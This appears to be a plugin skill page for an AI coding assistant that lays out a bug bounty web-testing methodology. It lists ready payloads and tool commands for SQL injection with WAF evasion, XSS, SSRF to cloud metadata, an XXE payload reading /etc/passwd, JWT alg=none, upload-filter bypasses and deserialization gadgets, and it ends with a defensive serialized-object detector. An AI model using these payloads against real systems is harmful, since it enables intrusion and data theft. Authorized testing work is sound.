From cybersec-toolkit
Provides OWASP-aligned bug bounty testing methodology with attack catalog, payload sources, and tool ordering for SQLi, XSS, SSRF, SSTI, IDOR, auth, race conditions, file upload, and deserialization.
Slash command: `/cybersec-toolkit:bounty-web`
Build on top of `bounty-recon` results. Tool-first: use SecLists wordlists (already cloned in this installer) before writing custom payloads.
| Test | How |
|---|---|
| Default creds | hydra, manual common pairs (admin:admin, root:root) |
| User enum (different errors) | manual login form probing |
| Account takeover via password reset | inspect token entropy, host header injection on reset email |
| Session fixation | check if session ID is set before login |
| Session predictability | gather 50+ tokens, run statistical analysis |
| MFA bypass | response manipulation (401→200), brute the OTP, race the verify endpoint |
| Login CSRF | missing CSRF token on /login |
| Logout / impersonation flaws | swap session cookies, replay |
- Access control: path variants such as `/users/../admin/users`.
- JWT: change `role: user` → `role: admin`, then re-sign or use `alg=none`.
- Race conditions: `turbo-intruder` or parallel `curl`.

Methodology: enumerate all endpoints as a low-privilege user, then re-request each with no auth, an expired token, and another user's token. Diff the responses.
```bash
# DOM/reflected discovery
dalfox url https://target.com/?q=test
xsstrike -u "https://target.com/?q=FUZZ"
# Stored — manual; create accounts and probe every input field
```
CSP analysis: parse Content-Security-Policy header — look for unsafe-inline, unsafe-eval, wildcards, exploitable allowlisted CDNs (*.googleapis.com allows JSONP).
```bash
sqlmap -u "https://target.com/page?id=1" --batch --level=5 --risk=2 --random-agent
# When WAF blocks
sqlmap ... --tamper=between,space2comment,charencode
```
- Cloud metadata endpoints: `169.254.169.254`, GCP `metadata.google.internal`, Azure `169.254.169.254/metadata/instance`.
- Localhost filter bypass chain: `localhost` → `127.0.0.1` → `0.0.0.0` → `127.1` → `2130706433` (decimal IP) → DNS rebinding.
- Internal service payloads: `gopherus --exploit mysql/redis/...`
- SSTI: `{{7*7}}` → if the response contains 49, identify the engine, then the RCE payload.
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
```
Try blind XXE with out-of-band exfil (Burp Collaborator, your own server).
These pay the highest because scanners can't find them. Always think:
Examples that have paid 5-figure bounties: race conditions on coupon redemption, integer over/underflow in price/quantity, refund-without-return, IDOR on transaction history.
Always try (in order):
1. `.php`/`.asp`/`.jsp` upload
2. Double extensions: `file.php.jpg`, `file.jpg.php`
3. Alternate extensions: `.phtml`, `.php5`, `.phar`, `.phps`
4. Null byte: `file.php%00.jpg`
5. `Content-Type: image/jpeg` on a PHP body
6. Magic-byte prefix: `GIF89a<?php ?>`
7. `.htaccess` upload to remap extensions

Detect: serialized blobs in cookies/parameters (`O:8:"User":...` PHP, `rO0AB...` Java, `gASV` Python pickle, `ac` Ruby).
| Language | Tool |
|---|---|
| Java | ysoserial, marshalsec |
| .NET | ysoserial.net |
| PHP | phpggc |
| Python | manual pickle (__reduce__) |
| Ruby | manual + marshal |
| Node | node-serialize IIFE payload |
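Added example, not code from the toolkit or this page: a defender-side scan that flags cookie or parameter values carrying the serialized-object markers listed above, so endpoints that accept serialized objects can be found in traffic and reviewed. The Ruby marker is left out because the page gives it ambiguously; the sample request is constructed.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Markers listed above. PHP's format is text and is matched directly; Java and pickle
# are binary, so their magic is checked raw and again after base64 decoding
# (base64 of 0xACED0005 begins "rO0AB", base64 of 0x800495 begins "gASV").
PHP_OBJECT = re.compile(rb'^O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')
RAW_MAGIC = {"java-serialization": b"\xac\xed\x00\x05", "python-pickle": b"\x80\x04\x95"}

def _maybe_b64(value):
    """Decode standard or URL-safe base64, tolerating stripped padding and '+' -> ' '."""
    cleaned = value.strip().replace(b" ", b"+").replace(b"-", b"+").replace(b"_", b"/")
    cleaned += b"=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None

def classify(value):
    """Return the serialization format a cookie/parameter value looks like, else None."""
    raw = unquote(value).encode("latin-1", "ignore")  # percent-decode only; keep '+'
    decoded = _maybe_b64(raw)
    for blob in ([raw, decoded] if decoded else [raw]):
        if PHP_OBJECT.match(blob):
            return "php-serialize"
        for name, magic in RAW_MAGIC.items():
            if blob.startswith(magic):
                return name
    return None

def scan(request):
    """Walk {"cookies": {...}, "params": {...}}; return (location, name, format) per hit."""
    hits = []
    for location, kv in request.items():
        for name, value in kv.items():
            fmt = classify(value)
            if fmt:
                hits.append((location, name, fmt))
    return hits

# Constructed sample request (not captured traffic): PHP cookie, Java stream, URL-encoded pickle.
SAMPLE = {
    "cookies": {"session": "abc123",
                "user": base64.b64encode(b'O:4:"User":1:{s:4:"role";s:4:"user";}').decode()},
    "params": {"state": base64.b64encode(b"\xac\xed\x00\x05sr\x00\tSomeClass").decode(),
               "prefs": quote(base64.b64encode(b"\x80\x04\x95\x03\x00\x00\x00\x00\x00\x00\x00}\x94.").decode()),
               "q": "hello world"},
}
```

Run `scan(SAMPLE)` to list the three flagged values; each hit names where the blob sits and which format it resembles.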
Recon: subfinder, httpx, katana, gau, waybackurls
Discovery: ffuf, gobuster, feroxbuster, dirsearch
Scanners: nuclei, nikto, arjun (param mining)
Specific: sqlmap, dalfox, xsstrike, commix, tplmap, jwt_tool
Wordlists: SecLists (cloned), PayloadsAllTheThings (cloned)
Per finding:
Strip credentials from the report. Show that access works, not the credentials themselves.
Use the writeup-template skill for your own records.
Install: `npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkit`